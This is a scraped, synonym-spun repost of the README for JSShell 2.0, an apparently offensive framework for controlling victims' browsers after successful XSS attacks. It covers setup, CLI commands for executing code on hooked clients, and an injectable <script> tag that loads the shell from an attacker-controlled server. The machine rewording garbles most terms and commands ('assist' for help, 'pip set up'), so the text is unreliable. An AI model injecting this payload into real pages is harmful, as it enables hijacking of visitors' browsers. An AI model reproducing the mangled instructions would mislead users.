JSShell – An Interactive Multi-User Web JS Shell

JSShell - An Interactive Multi-User Web JS Shell

An interactive multi-consumer internet primarily based javascript shell. It was initially created with a purpose to debug distant esoteric browsers throughout experiments and analysis. This instrument might be simply connected to XSS (Cross Site Scripting) payload to realize browser remote code execution (much like the BeeF framework).
Version 2.Zero is created completely from scratch, introducing new thrilling options, stability and maintainability.

Daniel Abeles.

Shell Video


  • Multi consumer assist
  • Cyclic DOM objects assist
  • Pre flight scripts
  • Command Queue & Context
  • Extensible with Plugins
  • Injectable by way of <script> tags
  • Dumping command output to file
  • Shell pagination

Installation & Setup

Config File
In the sources listing, replace the config.json file along with your desired configuration:

  • Database host – if working with the docker deployment methodology, select the database host as db (which is the interior host identify).
  • Return URL – the URL which the requests will comply with. The shell.js file does some AJAX calls to register and ballot for brand spanking new instructions. Usually it is going to be http://{YOUR_SERVER_IP}:{PORT}.
  • Startup script – a script that runs mechanically when the JSShell CLI consumer is spawned.
  • It can be doable to level at a remote database if desired.

This new model instructed putting in and working by way of docker and docker-compose. Now, to put in and run the complete JSShell framework, merely run:

$ ./start_docker_shell.sh

This will:

  • Start and create the database within the background
  • Start the online API server that handles incoming connections within the background
  • Spawn a brand new occasion of the JSShell command line interface container

If you continue to need to use the outdated style methodology of putting in, merely ensure you have a MongoDB database up and working, and replace the config.json file residing within the sources listing.
I like to recommend utilizing a digital atmosphere with pyenv:

$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv

Or utilizing virtualenv:

$ virtualenv -p python3.6 venv
$ supply venv/bin/activate

Then, set up the necessities:

$ pip set up -r necessities.txt

If you used the docker methodology, there isn’t any must run the next process.

Web Server
Otherwise, as soon as we have now the database setup, we have to begin the online API server. To do, run:

This will create and run an online server that listens to incoming connections and serves our JSShell code.

Now to begin the JSShell CLI, run the identical script however now with the shell flag:

After setup and working the required elements, enter the assist command to see the accessible instructions:

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
>> assist

Documented instructions (sort assist <subject>):

General Commands
edit                Edit a file in a textual content editor
assist                List accessible instructions or present detailed assist for a selected command
historical past             View, run, edit, save, or clear beforehand entered instructions
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
give up                Exit this utility

Shell Based Operations
again                Un-select the present chosen consumer
purchasers             List and management the purchasers which have registered to our system
instructions            Show the executed instructions on the chosen consumer
dump                Dumps a command to the disk
execute             Execute instructions on the chosen consumer
choose              Select a consumer as the present consumer


JSShell helps 2 strategies of operation:

  1. Injectable Shell (much like BeeF framework)
  2. Hosted Shell (for debugging)

Injectable Shell
Similar to different XSS management frameworks (like BeeF), JSShell is able to managing profitable XSS exploitations. In instance, in case you can inject a script tag, inject the next useful resource to your payload, and a brand new consumer will seem in your console:
<script src="https://{YOUR_SERVER_IP}:{PORT}/content/js"></script>

Hosted Shell
If you want to debug unique and esoteric browsers, you possibly can merely navigate to http://{YOUR_SERVER_IP}:{PORT}/ and a brand new consumer will pop up into your JSShell CLI consumer. Now it’s debuggable by way of our JSShell console.

Canop for JSON.prune

use it at your personal duty and danger.

MoreTip.com MoreTip.com


Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.